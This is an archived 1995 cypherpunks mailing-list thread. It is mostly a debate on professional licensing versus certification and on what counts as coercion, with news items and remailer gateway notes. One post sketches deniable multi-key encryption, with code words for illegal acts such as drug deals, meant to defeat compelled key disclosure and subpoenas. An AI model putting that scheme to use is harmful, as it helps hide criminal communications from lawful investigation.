Which, as I have indicated, I see as a "distinction without a difference."

> Also, I see
> violence and coercion as being ultimately related to something physical.
>

So you wouldn't consider the Hollywood blacklist coercive? What about revocation of tax free status?
I could go on for hours of examples how one can be hurt without a physical element.

> I'm not sure what "proper", "competent to practice"... mean.

In the context I was using them, they mean whatever the licenser (certifying authority if you prefer) says they mean- this is part of the point.

> And I see a
> big difference in a market based monopoly and a government based monopoly.
>

Which, I think, is your key error- particularly in the context of this licensing issue, where the difference is nearly invisible.

> [snip]
> >Didn't I just say this above?
> >
> >A centralized, or several centralized authorities.
>
> I had assumed you meant by authority an agent of the state that is able to
> invoke or otherwise wield the physical force of the state.

I think your hangup is one of overdemonizing the state to the point where no other evils seem to exist.

> By a certifying
> entities I was referring to private organizations that had no similar power
> or to government organizations that had only the power to provide
> information.

Like TRW. Would you argue there is no coercive power in this entity? Yet they are not affiliated with government.

> By a licensing entity I was referring to an organization that can coerce to
> prevent the unlicensed from doing the licensed behavior. By coercion I
> meant the threat of physical force or the force itself.

And as I indicated before, one need not threaten violence to coerce. I will point to the TRW example again.

> Though one might
> think of physical force as applying to murder, kidnapping, slavery,
> assault, robbery, physical theft, I would also apply it to theft or damage
> of abstract property that has properties like physical property. I intend
> for these to apply to many actions of the state.

I think you have failed to apply them to other organizations. Again, I think you are over-enamored with hating "the state." Many organizations not affiliated with government do violence to abstract properties.
> Perhaps I erred in applying "certification" and "license" to these
> contrasting concepts, but I do think the distinction is important and the
> observation that there are fuzzy areas in between does not remove that.
>
> If I have a license from the local gang to sell drugs and the guy across
> the street does not, I could encourage the gang to do something and the guy
> might get shot. Similarly, if I was a PE and my competitor across the
> street was not, I could encourage the state to do something that--with
> several stages of his lack of cooperation--results in his finding a gun in
> his face or worse.

If I am a producer in a horizontal territory limitation agreement for sales of widgets, and bob is not, bob's attempt to move into my area and sell widgets will be met with a boycott by all the members of my agreement. Is this any less coercion? I understand the violence is fairly dramatic coercion, but it is hardly the only coercion. Do you not consider the Clipper program coercion?

I suggest you take a look at Nozick, Coercion, in Philosophy, Science and Method (S. Morgenbesser ed. 1969) or Zimmerman, Coercive Wage Offers, 10 Phil & Pub. Aff. 121 (1981). Also, see Kreimer, Allocational Sanctions: The Problem of Negative Rights in a Positive State, 132 U. Pa. L. Rev. 1293 (1984). Personally I think Justice Stone had it correct with "Threat of loss, not hope of gain, is the essence of economic coercion." You might also take a look at the Yale Law Review article by Reich: (73 Yale 7 I think)

> >I guess the center of my question is, how can you apply Web of Trust to
> >e.g. a university degree. Who cares what Bob and Alice think my degree
> >is in, the client only wants to know from the institution.
>
> It does not matter why people would trust a certifying entity. It might
> have a great earned reputation, it might "borrow" some reputation from
> bonding or audits, or it might have ties to the Real World.

Exactly, it must be tied to some kind of authority.
In this case, the issuing institution is about the only acceptable one. I stand by the contention that a University degree cannot be certified acceptably by an authority not in some way connected to the University.

> > Licensing can only be done by an
> >> entity that can use physical force to prevent
> >> buying and selling legal services.
> >
> >I believe you are incorrect, but I guess my main concern is your
> >characterization of "Physical force." I am assuming you mean coercion,
> >and not that you will be jailed or such (though this may be the case).
> >
> >I would argue that as long as coercion exists (violence of any type,
> >physical or not) you have a licensing authority. Take the hollywood
> >blacklist. No one actually pushed around suspected pinko screenwriters
> >(well, at least, if anyone did, it was incidental) but they certainly
> >faced a great deal of persuasive motivation. Look at the committee as
> >the licensing authority here. (Licensing you as a non-communist as it were).
>
> It seems I am using coercion in a different sense. Unless blacklisting has
> physical force at its root enforcement mechanism it is not coercion and is
> very fragile.

You are using coercion in a different sense. One of the definitions I get in Webster's (while force is incorporated in some others) is "to compel to do something by the use of power, intimidation or threats." If you prefer that I use "serious persuasion" instead, fine, but I think you are just splitting hairs.

> >If several governmental and private authorities were in the practice of
> >certifying that Bob has a law degree from Tremont University, and that he
> >is competent to practice in D.C., and given that the citizens of D.C.
> >will look for these credentials, isn't this a license? Afterall, Bob has
> >to pass some test or requirement to get the signatures. Isn't this
> >coercion in your definition?
>
> No. I apologize for any confusion.
You needn't apologize, but I must admit, this looks a lot like coercion to me, as well as to Reich, and several justices of the Supreme Court. Do you believe it impossible/insignificant to manipulate behavior by persuasive means other than violence or the threat of actual physical violence?

> >Can't the multiple authorities set common
> >or near common guidelines? Rather, don't they HAVE to in order to have
> >their signatures worth the electrons they are transmitted with?
>
> In general, No. Under many conditions market forces make services alike,
> but more often competing businesses find particular market niches.

An example please? With specific regard to certifying authorities and university degrees?

> I would
> expect that different certs would cover different levels of expertise,
> different specializations and different breadths of specializations. Any
> lawyer might have a dozen certs. I would not expect there to be a single
> level of certification for all applications. I know of several companies
> in which the primary product designer has no engineering degree.

But certainly all lawyers must have some base level of certification, even if this is only market enforced? i.e. no one would accept a lawyer with NO certification (or few enough people to make it impossible to be one with some certification). This being so, the withholding of the required certification is still co- er... persuasion, no?

> >If you take the extreme position you seem to, there's an antitrust case here.
> I don't insist there has to be a variety. I only desire that coercion does
> not come into play in preventing it. As I said, if a natural monopoly
> forms at times, I am not worried.

I still am having trouble understanding your definition of coercion.

>
> >Am I not "licensing" my key signature to people provided they pass my key
> >signature criteria? Am I not doing violence by withholding my signature
> >and the benefits it might convey for certain "terms?"
> [snip]
> >This is the trap of the licensing argument.
>
> I see a big difference in withholding a signature and sending gunmen.
> There is no violence in withholding a signature.

There is no PHYSICAL violence, this I have admitted, but the economic violence of such an act can be significant. It seems that for you the distinction is in the emotional effect of the application of persuasive force, rather than the effect.

I've given this example before. We take two convicted carjackers. The first we sentence to 5 years, but after 4 years and 50 weeks, tell him that we are going to extend the sentence another 10 years unless he takes an experimental vaccine. The second we sentence to 15 years, and after 4 years and 50 weeks, we tell this one that we will cut off 10 years from the sentence if he takes the experimental vaccine. What's the difference? Both have been given two choices 1> Spend 15 years, no vaccine. 2> Spend 5 years, take vaccine. The point is that the first is emotionally more stacked, you feel sorry for the carjacker (well, maybe I should have picked crypto exporter) because he has been tricked. When asked, 90% respond that the first is more "unfair." Allowing emotion to cloud one's judgement of what is and is not coercive is a mistake.

> >The evil is not licensing, which I think serves a real purpose, but
> >created convenience fees, taxation through the withholding of licensing
> >and the use of other government largess. I wrote a massive piece on this
> >and sent it to the list about a year and a half ago. With interest I will
> >repost it.
>
> Even if no one else is interested, I'd like to see it.

Let me dig it up. Absent another public request I will send it in E-Mail only.

> >The real question is how you decide what an authority to license is. Is
> >it to be dictated by government? Or by market forces (i.e. the
> >reputation of the licenser).
>
> Yes, the government vs.
> market question is key, but I believe the answer is
> in that distinction I used in contrasting terms "certification" and
> "license". The "who" is tied up in what the instrument is.

I believe that your defining the words merely to distinguish who the certifying authority is confusing- and deceptive.

> >> >I don't see how the net will eliminate the basic need for highly
> >> >qualified professionals and the proof that they have credentials.
> >>
> >> It won't. The needs might shift a little but they
> >> will be there.
> >
> >Then why will lawyers, or a 'professional monopoly' be broken?
>
> The meaning of "qualified professional" and "credentials" will be
> market-based and multidimensional, not defined by the state or a group
> already "qualified" using the state for enforcement.

I still think you are mistaken in that I feel you are ignoring the fact that no market exists below a certain certification level, regardless of how diverse the certifiers are. You also still miss that credentials for attorneys are already multidimensional.

[market monopolies are "softer" than government ones.]

> >these authorities, and if (as you seem to be saying a few paragraphs up) it
> >is hard to break into the trusted certification business, there is a
> >monopoly again.
>
> I don't really think this is a problem. It is the force-based monopoly and
> specifically the government-based monopoly I have a problem with.

I will point to the oil companies in the industrial age, as well as the railroads. Certainly the potential for violence is not limited to government. I hate this example, but in this particular case I think you are missing its context.

> [snip]
> >Like the several state Bars?
>
> The market advantage is slight.

I'm not sure I follow you here.

> [snip]
> >So you have essentially admitted that a central authority is required?
> >Or will be more often used?
>
> Not required.

Then how do you explain the points I have brought up.
The base requirement of a certification from an education institution (for which you have provided no substitute). The existence of a floor, below which it is impractical to practice a profession, and the existence of a set of entities (of whatever number) whose signatures are required to transcend this floor.

> [snip]
> >If your definition of license is simply who does the coercing, I think you
> >should reconsider.
>
> Whatever the word used, I see the distinction between 1) the assertion of
> certain information and 2) the threat of force as being key.
>
> Perhaps, I could have used the phrases "non-coercion-based" licensing and
> "coercion-based" licensing, but I am not comfortable with these--trade
> licensing invokes too violent of an image.

I think this construction is still flawed. I will remain by my position that licensing is useful when not used to collect taxes or otherwise overregulate. I also hold that the distinctions you make between licensing and certification are without functional difference in effect and are deceptive in that they suggest a significant difference in effect or purpose where there is none.

> A note to all in government licensed trades: I recognize that licensing is
> part of the real world we live in. Often one has to be licensed to
> practice a favorite trade. I do not mean to describe the licensed
> themselves as violent.

Thanks.

> Dar
>
> ===========================================================
> Dar Scott                  Home phone: +1 505 299 9497
> Dar Scott Consulting       Voice:      +1 505 299 5790
> 8637 Horacio Place NE      Email:      darscott at aol.com
> Albuquerque, NM 87111                  dsc at swcp.com
> Fax: +1 505 898 6525
> http://www.swcp.com/~correspo/DSC/DarScott.html
> ===========================================================

From unicorn at polaris.mindport.net Thu Sep 14 03:33:03 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Thu, 14 Sep 95 03:33:03 PDT
Subject: cryptography eliminates lawyers?
In-Reply-To:
Message-ID:

On Thu, 14 Sep 1995, Duncan Frissell wrote:

> On Wed, 13 Sep 1995, Black Unicorn wrote:
>
> > But won't clients insist on proper credentials in one form or another?
> > Doesn't the practicality and accountability of a centralized authority
> > (or several authorities) provide the best answer to this? Who is going
> > to accept my signature promising that I did indeed get a law degree and
> > pass the bar?
>
> An educational institution can certify its own graduates --- it does
> now. Competing credentialing institutions is exactly what I would be
> looking for as opposed to today's coercive monopoly.

Yes, in the context of competing credentialing institutions I agree, but even now there is a base certification for such institutions (accreditation) which is doled out by a central authority, or common standards. What the other writer's approach missed was that one could not, in the end, do away with the basic requirement for some kind of standardization, even if it was market driven. While I too prefer the market approach, I still contend that a floor of credentials will exist, and indeed, should exist.

> No matter how skilled, it is illegal for an unlicensed person to practice
> law, medicine, or many other professions in any state. The nets weaken
> these restrictions because they allow action at a distance.

But I believe there will still be a demand for an objective, or trusted, authority in the market. This was my point when I asserted that certificates from Bob and Alice that I was a decent attorney would not be sufficient for most unless Bob and Alice were trusted in the "attorney credential" area. So in the end, isn't a trusted authority required to some degree?

I think the difference here, as opposed to the Web of Trust in e.g., PGP, is that you are talking about legal talent, or any professional talent, for which payment is being made. It's easy to accept a signature from Mr. Mar indicating that Bob has (in Mr.
Mar's opinion) decent key management habits, but it's asking a great deal to extend that trust in Mr. Mar to his opinion of Bob's legal skills. For that there will be a demand of more detailed and certain expertise in Mr. Mar, and also a trust that Mr. Mar is not just helping an upstart friend of his make some money in consulting for nuclear physics projects. i.e. it is very difficult to establish the objectivity of a certifier without some kind of public and significant risk on the part of the certifier coupled with some verifiable skill in appraising nuclear physics skill- a situation I would argue is almost impossible without a certificate from an institution which meets some base credentials, which are set up publicly by an objective process, or nearly so.

> Note the other effects of the nets. They make it hard to tell that you
> *are* working which reduces the impact of regulations of work by
> "illegal aliens." Thus if I am wandering through the South of France
> while writing the 'Great American Novel' I am unlikely to get busted for
> violation of work restrictions. The nets expand the number of jobs I
> can do while innocently wandering the South of France. I can or will
> soon be able, for example, to manage a large international corporation
> from anywhere.

This I understand and applaud.

> DCF
>
> "Who actually prefers Le Massif Central to those hot and crowded southern
> climes."

From pfarrell at netcom.com Thu Sep 14 04:39:39 1995
From: pfarrell at netcom.com (Pat Farrell)
Date: Thu, 14 Sep 95 04:39:39 PDT
Subject: DD, pedaphiles, and Terrorists, oh my
Message-ID: <27512.pfarrell@netcom.com>

Today's Washington Post (9/14) has a front page article on a bust of 12 computer-using pedophiles.

NBC news is saying that Janet Reno will have a news conference later this morning.

Tomorrow near NIS&T, the workshop on the Federal Key Escrow Standards will be held.

Coincidence?

Pat

Pat Farrell      Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info.
Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage
#include

From dsc at swcp.com Thu Sep 14 04:57:54 1995
From: dsc at swcp.com (Dar Scott)
Date: Thu, 14 Sep 95 04:57:54 PDT
Subject: cryptography eliminates lawyers?
Message-ID:

Black Unicorn wrote,

[snip]
>> We seem to be having problems with the meanings of words. For example, I
>> make a distinction between certification and licensing.
>
>Which, as I have indicated, I see as a "distinction without a difference."

We're at a standoff here.

[snip]
>So you wouldn't consider the Hollywood blacklist coercive?
>What about revocation of tax free status?

Not as you describe it. No.

[snip]
>
>> And I see a
>> big difference in a market based monopoly and a government based monopoly.
>>
>
>Which, I think, is your key error- particularly in the context of this
>licensing issue, where the difference is nearly invisible.

This is our standoff.

[snip]
>I think your hangup is one of overdemonizing the state to the point where
>no other evils seem to exist.

Actually, I think that much coercion (as I used it) is outside the state. I also believe there is much evil outside of coercion but that is probably outside the scope of the topic. I do admit that I am emphasizing coercion and using that as the dividing line more than other types of evil.

[snip]
>
> Though one might
>> think of physical force as applying to murder, kidnapping, slavery,
>> assault, robbery, physical theft, I would also apply it to theft or damage
>> of abstract property that has properties like physical property. I intend
>> for these to apply to many actions of the state.
>
>I think you have failed to apply them to other organizations. Again, I
>think you are over-enamored with hating "the state." Many organizations
>not affiliated with government do violence to abstract properties.

I referred to the physical force used by gangs to enforce neighborhood rules.
After pondering this, I think this does not apply to my approach. The state is brought up because it is the agent of coercion in licensing.

[snip]
>If I am a producer in a horizontal territory limitation agreement for
>sales of widgets, and Bob is not, Bob's attempt to move into my area and
>sell widgets will be met with a boycott by all the members of my
>agreement. Is this any less coercion? I understand the violence is
>fairly dramatic coercion, but it is hardly the only coercion. Do you not
>consider the Clipper program coercion?

The first is not. The Clipper program (as I understand it) is. Remember, my guideline is simple threat of physical harm.

>I suggest you take a look at Nozick, Coercion, in Philosophy, Science and
>Method (S. Morgenbessed ed. 1969) or Zimmerman, Coercive Wage Offers, 10
>Phil & Pub. Aff. 121 (1981). Also, see Kreimer, Allocational Sanctions:
>The Problem of Negative Rights in a Positive State, 132 U. Pa. L. Rev.
>1293 (1984).

I'll look for Nozick.

[snip]
>> >I guess the center of my question is, how can you apply Web of Trust to
>> >e.g. a university degree. Who cares what Bob and Alice think my degree
>> >is in, the client only wants to know from the institution.
>>
>> It does not matter why people would trust a certifying entity. It might
>> have a great earned reputation, it might "borrow" some reputation from
>> bonding or audits, or it might have ties to the Real World.
>
>Exactly, it must be tied to some kind of authority. In this case, the
>issuing institution is about the only acceptable one.
>
>I stand by the contention that a University degree cannot be certified
>acceptably by an authority not in some way connected to the University.

I think such a certification is consistent with my desire for a lack of physical coercion in this. I assume you'd be willing to let the market prove this point.

[snip]
>You are using coercion in a different sense.
>One of the definitions I
>get in Webster's (while force is incorporated in some others) is "to
>compel to do something by the use of power, intimidation or threats."
>
>If you prefer that I use "serious persuasion" instead, fine, but I think
>you are just splitting hairs.

I think there is a big difference between "I'm going to break your house windows unless you give me $50" and "I'm going to stop delivering milk unless you pay your $50 milk bill".

[snip]
>Do you believe it impossible/insignificant to manipulate behavior by
>persuasive means other than violence or the threat of actual physical
>violence?

No. And for me there are cases when it would be wrong. I won't comment on when it is wrong for others, but in the alternate case that includes violence or the threat, I will say it is wrong.

>> >Can't the multiple authorities set common
>> >or near common guidelines? Rather, don't they HAVE to in order to have
>> >their signatures worth the electrons they are transmitted with?
>>
>> In general, No. Under many conditions market forces make services alike,
>> but more often competing businesses find particular market niches.
>
>An example please? With specific regard to certifying authorities and
>university degrees?

A BA and BS have become practically the same, but a BSET (tech) is very different from a BSEE (engineer).

[snip]
>I still am having trouble understanding your definition of coercion.

[snip]
>> I see a big difference in withholding a signature and sending gunmen.
>> There is no violence in withholding a signature.
>
>There is no PHYSICAL violence, this I have admitted, but the economic
>violence of such an act can be significant. It seems that for you the
>distinction is in the emotional effect of the application of persuasive
>force, rather than the effect.

Oh. You are right in the last part. The distinction is NOT the effect. Not the emotional effect either. It is the ethics and pragmatics of relying on a competition of ideas and not force.
To put it bluntly, coercion (as I defined it: murder, theft, ...and the threat thereof) is a sin.

[snip]
>Allowing emotion to cloud one's judgement of what is and is not coercive
>is a mistake.

Agreed. I have clear guidelines.

>I believe that your defining the words merely to distinguish who the
>certifying authority is confusing- and deceptive.

The concepts of coercive methods and noncoercive methods are there regardless of the words. I prefer agents of the first over agents of the latter.

[snip]
>[market monopolies are "softer" than government ones.]

[Agreed.]

[snip]
>The base requirement of a certification from an education institution
>(for which you have provided no substitute).

Let the market decide if there really is one.

>The existence of a floor, below which it is impractical to practice a
>profession and the existence of a set of entities (of whatever number)
>whose signatures are required to transcend this floor.

Let the market decide.

[snip]
>> Perhaps, I could have used the phrases "non-coercion-based" licensing and
>> "coercion-based" licensing, but I am not comfortable with these--trade
>> licensing invokes too violent of an image.
>
>I think this construction is still flawed. I will remain by my position
>that licensing is useful when not used to collect taxes or
>otherwise overregulate. I also hold that the distinctions you make
>between licensing and certification are without functional difference in
>effect and are deceptive in that they suggest a significant difference in
>effect or purpose where there is none.
>

The difference in effect is in emergent market optimization. The difference in purpose is ethical. I have learned that you--and perhaps others--do not see an important difference in these two styles of influencing behavior. I see a major difference and, in thinking the difference was obvious, was slow in understanding your position.

Great. You're already enjoying breakfast and I still have to go to bed.
Dar

===========================================================
Dar Scott                  Home phone: +1 505 299 9497
Dar Scott Consulting       Voice:      +1 505 299 5790
8637 Horacio Place NE      Email:      darscott at aol.com
Albuquerque, NM 87111                  dsc at swcp.com
Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================

From jya at pipeline.com Thu Sep 14 05:23:52 1995
From: jya at pipeline.com (John Young)
Date: Thu, 14 Sep 95 05:23:52 PDT
Subject: WAS_tem
Message-ID: <199509141223.IAA08242@pipe4.nyc.pipeline.com>

9-14-95. NYPaper.

"Use of Computer Network For Child Sex Sets Off Raids."

   The Justice Department today announced a dozen arrests in a two year investigation into the use of America Online, the country's largest computer network, to distribute child pornography and to lure minors into sex. The culmination of the inquiry by the Federal Bureau of Investigation comes at a time when the agency has needed some favorable attention to offset a string of incidents that have cast it in a negative light.

"Scientologists Lose a Battle on the Internet."

   Upholding free speech on the Internet, a Federal judge has ordered the Church of Scientology to return computers and files seized here last month from two men who used a computer bulletin board to disseminate information critical of the church. The equipment belongs to Factnet, an anti-Scientology bulletin board run by two Boulder men, Lawrence Wollersheim and Robert Penny.

2x: WAS_tem (16 kb)

From jpb at miamisci.org Thu Sep 14 05:36:40 1995
From: jpb at miamisci.org (Joe Block)
Date: Thu, 14 Sep 95 05:36:40 PDT
Subject: Scientology tries to break PGP - and
Message-ID:

re:
>[snip]
>> When the safety is finally removed from the gun at your head (sorry for
>> the drama) you hand over your alternate secret key.
>> If decrypted with the
>> "alternate" or "fake" secret key, the encrypted file is wiped until it
>> reaches a marker; the remainder of the file is displayed. If you use your
>> "primary" or "real key", the extraneous text is simply stripped.

Instead of stripping, how about adding an offset to the start and end of the ciphertext to each encoded idea key. This way, I can send text A to key A, text B to key B, C to C and so on. As long as the recipient and I have agreed in advance on which key to use to exchange the real message, who can say otherwise? If code words are used in all the messages to refer to any illegal acts, ("ship me 30 kilos of smack" might be a tad incriminating) how can anything be proved even if the recipient is compelled to divulge their key?

An added advantage to this scheme is that if properly used it should help throw a monkey wrench into traffic analysis by the nosy. If I regularly exchange encrypted messages with several different recipients, I can enclose a separate plaintext for each, make one massive combined cyphertext and send it to all of them. The ones I have no instructions or trade secrets for today will each receive "Ignore this message," followed by a randomly selected random number of fortunes or other random data (so each message to be ignored will have different length different plaintext to further thwart analysis). This may be combined with stealth PGP headers to make it difficult for LEAs to determine all recipients for the purpose of getting a subpoena for their keys.

Joseph Block

"We can't be so fixated on our desire to preserve the rights of ordinary Americans ..."
-- Bill Clinton (USA TODAY, 11 March 1993, page 2A)

From dcl at panix.com Thu Sep 14 07:28:31 1995
From: dcl at panix.com (David C. Lambert)
Date: Thu, 14 Sep 95 07:28:31 PDT
Subject: Crimestoppers anon tip mailbox
Message-ID: <199509141428.KAA10931@panix.com>

Frank Stuart writes:

> Now that you mention it, it seems to me that completely anonymous tipsters
> with the ability to receive ecash rewards would likely be a bigger boon to
> law enforcement types than would easily tappable communications lines.
> Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for
> use through the remailers)?

I might be.

> You could set up a web-page with instructions
> and a list of crimes for which there are rewards. Perhaps some civic
> organizations would be willing to donate money for tips leading to arrests
> and convictions of any crimes.

Excellent idea. Then it could be brought to the attention of a candidate or two that have net.crime on their agendas.

> Even if it doesn't catch any bad guys, it'd be
> great PR for strong crypto, anonymity, ecash and whoever runs it.
                                                   ^^^^^^^^^^^^^^^

Well, I don't know about the last part - it seems to me that opinions would be mixed.

The only thing that I'm not sure of is the use of ecash - mostly because I haven't really been keeping track of the state of the art. Could some people who are better informed on the subject discuss whether this is a feasible way to use it?
I wasn't actually thinking of rewards, mostly because you'd have to arrange some sort of reply block from the anonymous tip mailbox. Most people (even remailer users) don't know how or don't wish to use these, so I don't know if that part would really fly.

David C. Lambert
dcl at panix.com

From rsalz at nntp.com Thu Sep 14 07:31:06 1995
From: rsalz at nntp.com (Rich Salz)
Date: Thu, 14 Sep 95 07:31:06 PDT
Subject: Mixmaster posting poll
Message-ID: <199509141429.KAA23068@nntp.com>

> I think that I am not being clear enough about what I want to do.

Ah, now I understand -- thanks for the clarification.

Let me waste a bit of time on some general news/mail issues. The two formats are very similar, but not identical. This is generally a good thing. For example, it's easy to write a single user interface that handles both. (Many people like having killfiles on their email, for example.) However, when you start to gateway between the two, the differences become more important. For example, suppose an article has To, Newsgroups, and Cc headers. What should happen? Some news user-agents (used to?) email as well as post when given a news article with those headers. And what happens when an article is then gatewayed back out to email, and care isn't taken to strip those headers off? (Rhetorical question; I don't know.)

I think this is of particular concern to this community. Imagine a mail->news remailer that gatewayed messages by connection to UUNET's accept-from-anyone server and posted them to alt.blacknet. Interested parties might then get a full feed and locally gateway alt.blacknet into a mailing list. So this kind of multi-time gatewaying, if not common now, could (and should?) be soon.
I guess that's a long way of saying "be careful." :)

The advantage of using "news.group at gateway.host" is that it might avoid these confusions since the Newsgroup header appears out-of-band. However setting up gateways like this is often harder, requiring special prefixes (viz., usenet.news.group at gate.host is/was common), hundreds (thousands) of aliases, or the ability to set up special mailer config (typically sendmail.cf on the internet these days) that recognize only the top-level hierarchies (of which there are hundreds, changing weekly). There is also the problem of making sure that the mail newsgroup list is kept in sync with the local host's newsgroup list. An even bigger problem is that cross-postings are essentially impossible (you get multiple copies); this can be annoying if you want to cross-post to a group that the gateway host doesn't receive. A workable trick is to post to control,alt.blacknet -- everyone "gets" control but only those that care will see the article where it should really go.

If you use something like mail2news at gate.host, then the newsgroups are in the Newsgroups header. You have to be careful about To and Cc but you don't have the problems mentioned above. I think the header problem is more likely fixed/fixable, and therefore suggest the second syntax.

If you do local gatewaying, you should really send your article into rnews and not inews. Inews will mess with headers, which is okay for users or scripts that know they can be sloppy. But not okay for gateways which don't want .signature files appended, too-much-quoted-text counted, etc. Feeding into rnews is not difficult -- you need merely ensure that your message has these six headers: Message-ID, Newsgroups, From, Date, Subject, Path. The other advantage of feeding into rnews is that rnews always spools if the news processor is unavailable, while inews doesn't.
Another option is to provide a program that can connect to a specified host and inject the gatewayed article directly using the NNTP protocol. This is not hard; INN includes a program (feedone.c) that does it in about 200 commented source lines. INN is available from many places, including ftp://ftp.uu.net/networking/news/nntp/inn/inn1.4sec2.tar.Z and my news/mail gateway software (newsgate) is available by sending me email.

Hope this helps.
	/r$

> At 8:35 AM 9/13/95, Rich Salz wrote:
> >> If the form alt.usenet.group at remailer.com was used, wouldn't the
> >> system running the remailer have to have an alias defined for each and
> >> every newsgroup that it plans on handling?
> >
> >No. Sites running sendmail, for example, could set up rules that
> >just knew the top-level hierarchies and fed those into a special
> >"mailer" that gatewayed them.
> >
> >My opinion is that making any names well-known is a bad idea, and
> >that attaching special semantics to "mail2news at xxx" is a real bad
> >idea. Instead, just send the message to the specified recipient
> >and let do whatever magic needs to be done.
> >
> >If mixmaster wants to function as a mail/news gateway, it should
> >do something special when it sees the Newsgroups header -- process
> >the message and feed it into rnews, presumably.
> >
> >I guess, but not yet having read the code do not know, that this is
> >cleaner and more easily extensible (or removable).
> > /r$
>
> ----------------------------------------------------------
> Lance Cottrell                 loki at obscura.com
> PGP 2.6 key available by finger or server.
> Mixmaster, the next generation remailer, is now available!
> http://obscura.com/~loki/Welcome.html or FTP to obscura.com
>
> "Love is a snowmobile racing across the tundra. Suddenly
> it flips over, pinning you underneath. At night the ice
> weasels come."
> --Nietzsche
> ----------------------------------------------------------

From samman-ben at CS.YALE.EDU Thu Sep 14 07:41:14 1995
From: samman-ben at CS.YALE.EDU (Rev. Ben)
Date: Thu, 14 Sep 95 07:41:14 PDT
Subject: WAS_tem
In-Reply-To: <199509141313.JAA12828@pipe4.nyc.pipeline.com>
Message-ID:

> The New York Times, September 14, 1995, pp. A1, B14.
>
> Use of Computer Network For Child Sex Sets Off Raids

[snip]

> Lawmakers have debated whether to restrict the use of
> computer networks. Today, a bill making it illegal to use
> computers to produce child pornography was introduced by
> Senator Orrin G. Hatch, the Utah Republican who heads the
> Judiciary Committee.
>
> The bill would expand the definition of child pornography
> to include any photograph, film, videotape or computer
> image produced by any means, including electronically by
> computer, if it depicts or appears to depict a minor
> engaging in sexually explicit conduct.

If I'm reading this correctly, if I Photoshop a kid's face onto the body of the latest Playboy centerfold, I'm in violation of this proposed law?

Ben

____
Ben Samman..............................................samman at cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant, and kindness from the unkind; yet, strange, I am ungrateful to those teachers.-- K. Gibran.
SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf at clark.net
http://www.netresponse.com/zldf
PGP encrypted mail welcomed--finger samman at cs.yale.edu for public key

From trollins at hns.com Thu Sep 14 07:48:21 1995
From: trollins at hns.com (Tom Rollins)
Date: Thu, 14 Sep 95 07:48:21 PDT
Subject: Scientology tries to break PGP - and
Message-ID: <9509141448.AA18318@dcn92.hns.com>

This area of court ordered key disclosure is troubling. I assume that failure to do so would be punished by "contempt of court" much like a reporter that refuses to reveal his information sources. (Jail or fine until the person complies with the order.)

If you have PGP encrypted messages on your disk which are encrypted to other people, is this a liability? Normally, you have no way to decrypt this data.

After looking at a PGP 'Hack' which allows the message to be encrypted with a session key different from the session key encrypted in the RSA header using someone's public key: your data could thus be encrypted in a PGP message to someone without using the session key specified in that RSA header. This someone else may or may not exist. You may have created a key pair and discarded the secret key. It would then seem that you could be found in "Contempt of Court" because you could not come forward with a private key belonging to someone other than yourself.

-tom

From mark at unicorn.com Thu Sep 14 07:51:56 1995
From: mark at unicorn.com (Rev. Mark Grant)
Date: Thu, 14 Sep 95 07:51:56 PDT
Subject: An opportunity not to be missed
Message-ID:

On Thu, 14 Sep 1995, Frank Stuart wrote:

> Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for
> use through the remailers)?
> You could set up a web-page with instructions
> and a list of crimes for which there are rewards.

Someone already tried that. The cops got a copy of the WWW logs and started investigating everyone who'd looked at the WWW page... So at the least you'd need a bunch of anonymous WWW proxies as well.

There's also the problem that the current ecash systems do not provide payee anonymity, so if you pay informers with ecash they can be traced if the bank and payer collude.

Mark

From robl at on-ramp.ior.com Thu Sep 14 07:56:40 1995
From: robl at on-ramp.ior.com (Rob L)
Date: Thu, 14 Sep 95 07:56:40 PDT
Subject: DD, pedaphiles, and Terrorists, oh my
In-Reply-To: <27512.pfarrell@netcom.com>
Message-ID:

On Thu, 14 Sep 1995, Pat Farrell wrote:

> Today's Washington Post (9/14) has a front page article on a bust of
> 12 computer-using pedophiles.
> NBC news is saying that Janet Reno will have a news conference
> later this morning.
> Tomorrow near NIS&T, the workshop on the Federal Key Escrow Standards
> will be held.
> Coincidence?

I think not.. Kind of like the coincidence that just before any gun law votes, some maniac goes on a shooting spree.. ;)

I would be interested to hear what Reno has to say.. if someone is in a position to hear/see it, and can drop the key parts here, I would appreciate it.

'Course, I would rather have pedophiles using computers than stalking parks..

Thanks-
RobL

From patrick at Verity.COM Thu Sep 14 08:11:08 1995
From: patrick at Verity.COM (Patrick Horgan)
Date: Thu, 14 Sep 95 08:11:08 PDT
Subject: Digital Fingerprinting
Message-ID: <9509141507.AA21086@cantina.verity.com>

> From: Mac Norton
> To: Patrick Horgan
>
> On Wed, 13 Sep 1995, Patrick Horgan wrote:
>
> > > > Then, in W.Ky., as in Stockbridge, "You can get
> > > > anything you want..."? :)
> > >
> > > I'd stick with:
> > > ***********************************************
> > > You can't always get what you want 1
> > > but if you try
> > > sometimes, sometimes you get what you need. 2
> > > ***********************************************
> > >
> > > 1 ability to dump garbage where you want
> > > 2 a better appreciation for the environment
> > > :-)
> > >
> > > Why do I feel like I'm sitting on the group W bench?
> >
> > I don't know, kid, what you in for?
>
> Encryption.

And they all moved away from me on the group W bench there, talking mean hairy eyeballs and all sorts of things until I said, "and annoying the NSA," and they all moved back, talking about crime, PEM, PGP, and liberty and justice for all;)

Patrick

 _______________________________________________________________________
/ These opinions are mine, and not Verity's (except by coincidence;).   \
| (\                                                                     |
| Patrick J. Horgan        Verity Inc.              \\    Have           |
| patrick at verity.com     1550 Plymouth Street     \\ _  Sword          |
| Phone : (415)960-7600    Mountain View            \\/   Will           |
| FAX   : (415)960-7750    California 94303        _/\\   Travel         |
\___________________________________________________________\)__________/

From anonymous at freezone.remailer Thu Sep 14 08:19:50 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Thu, 14 Sep 95 08:19:50 PDT
Subject: Feeb Slants Feeb Slur
Message-ID: <199509141519.LAA11102@light.lightlink.com>

FBI Probes Slant Allegations

Washington, September 14, 1995 (AP) -- The FBI says it has reviewed more than 250 cases involving work done by its crime lab after one of its agents alleged that his colleagues slanted their testimony and fabricated evidence to help prosecutors in high-profile cases.

